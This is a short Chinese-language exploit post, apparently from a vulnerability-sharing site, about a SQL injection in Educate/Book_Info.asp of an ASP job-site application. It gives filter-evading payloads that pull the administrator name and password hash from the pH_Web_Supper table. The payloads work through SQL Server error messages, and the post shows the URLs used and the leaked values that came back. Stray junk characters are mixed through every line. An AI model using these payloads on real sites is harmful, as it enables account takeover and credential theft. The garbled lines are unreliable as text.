漏洞出现在Educate/Book_Info.asp3 W7 H$ l ]0 d$ F2 x
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
1 Z" o0 |: a f% aexp:如下/ W [# T" t6 Z0 U1 W J
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
8 u2 }# |# K7 Q6 y r, @) P查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)' u, @" b" \' X5 T+ B& M
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)( r# |- a6 U- F$ L H
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
; W- J+ G: o+ O. y7 S4 I) T9 f将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
- H( \- U% v; j3 W( L' f/Educate/Book_Info.asp,行 81 N3 W- `! V& D8 @; O. v
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
% \& ~7 [! k# P0 Z; oMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
; N$ I Z Z/ e$ w将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
' R5 c D1 t: o. l" `2 T6 d% y4 X6 q/Educate/Book_Info.asp,行 8 |